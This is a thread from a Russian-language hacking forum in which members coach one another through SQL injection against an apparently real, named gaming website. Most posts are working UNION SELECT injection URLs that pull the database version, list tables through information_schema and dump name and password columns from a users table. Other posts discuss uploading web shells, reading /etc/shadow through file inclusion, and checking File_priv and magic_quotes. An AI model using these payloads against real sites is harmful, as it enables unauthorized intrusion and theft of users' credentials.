Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А смысл лить шелл?
    Как я его потом запущу если на сервере нет апача?
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    на сколько я понимаю апач тут не при чем у тебя же идет запрос к БД а не к апачу или ПО которое ты там написал,

    ЗЫ проще попробовать а потом спросить
     
    _________________________
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Не парьтесь, залейте для начала шелл, дальше по обстановке и в связи с осознанием полученной информации

    Плюс если у вас LFI или читалка - это даёт гораздо большие возможности, чем просто даже сразу (допустим) прочитать /etc/shadow

    Хотя бывает и такое

    забавно. Правда, забавно. Ну тогда сушить вёсла, наверное
     
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    ч0 не? просвети нас, великий хакер!
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 BlackSun:

    Ну если пароль расшифруешь, то да, о Генианельнейший из Гениев

    http://s40.radikal.ru/i087/0905/8e/a0bb203ffe39.jpg

    ыыыыыыы

    PS: бывают такие LFI, что /etc/shadow можно прочитать, но это не значит, что вы сможете залить хотя бы даже ВЕБ-ШЕЛЛ
     
    #8625 Pashkela, 27 Aug 2009
    Last edited: 27 Aug 2009
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a kak uznat magic_qupte on ili off??

    i kak uznat file_priv Y ili N ??
     
  7. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Например:
    http://google.com/news.php?id=0+union+select+1,File_priv,3+from+mysql.user--

    так мы узнаем File_priv
     
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    magic_quotes = off или On

    http://google.com/news.php?id=0+union+select+1,'p',3+from+mysq l.user--

    если результатом будет буква p тогда M_Q=off если же будет ошибка , тогда M_Q=on
     
    _________________________
  9. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    А если колонки не подобрал.....а если запрос не закрыл...(и ещё пару десятков вариантов)и вылезла ошибка..значит MQ=On? думай что пишешь.
     
  10. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    ob etix funkciyax est statya ??
     
  11. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    скажите есть ли виждет для оперы, с помощью которого можно перехватывать http пакеты и изменять их.
     
  12. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    не могу найти принтабельный столбец, хотя вроде их всего 1 )

    http://www.aawow.info/question2.php?id=-31+union+select+1--

    хелп)
     
  13. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.aawow.info/question2.php?id=-31+union+select+version()

    В тайтле смотри 5.0.81-community-log
     
    2 people like this.
  14. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    пытаюсь названия таблиц вывести таким запросом: http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema.tables+where+table_schema=%27aawowinf_wow%27

    в ответ - ошибка.....
     
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema.tables+where+table_schema=0x6161776f77696e665f776f77

    Может стоит немного почитать статьи ? (
     
  16. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...

    нашел интересные имена таблиц, users и userlist, подставляю их в запрос:

    http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schema.columns+where+table_name=7573657273

    выводит WoW в тайтле.
    Как получить всю интересующую нас инфу из этой таблицы? Если возможно, то без Limit?
     
  17. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    group_concat()

    _http://www.aawow.info/question2.php?id=-31+union+select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x757365726c697374

    0x757365726c697374 = userlist
     
    #8637 .:[melkiy]:., 27 Aug 2009
    Last edited: 27 Aug 2009
  18. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Если не ошибаюсь то надо не table_name а table_schema
    Темболее нужно в хекс коде (точнее: 0x + HEX) подставлять если работаешь через where (если фильтруются ковычки)
     
    #8638 wolmer, 27 Aug 2009
    Last edited: 27 Aug 2009
  19. Flair

    Flair Member

    Joined:
    7 May 2009
    Messages:
    36
    Likes Received:
    13
    Reputations:
    9
    Сильно не пинайте
    как подкючится к чужой БД, естественно зная логин и пороль :)))
     
  20. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    в таблице users оказалисьнесколько интересных записей: name, pass

    Делаю запрос:
    http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573657273

    Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...
     
    2 people like this.
Thread Status:
Not open for further replies.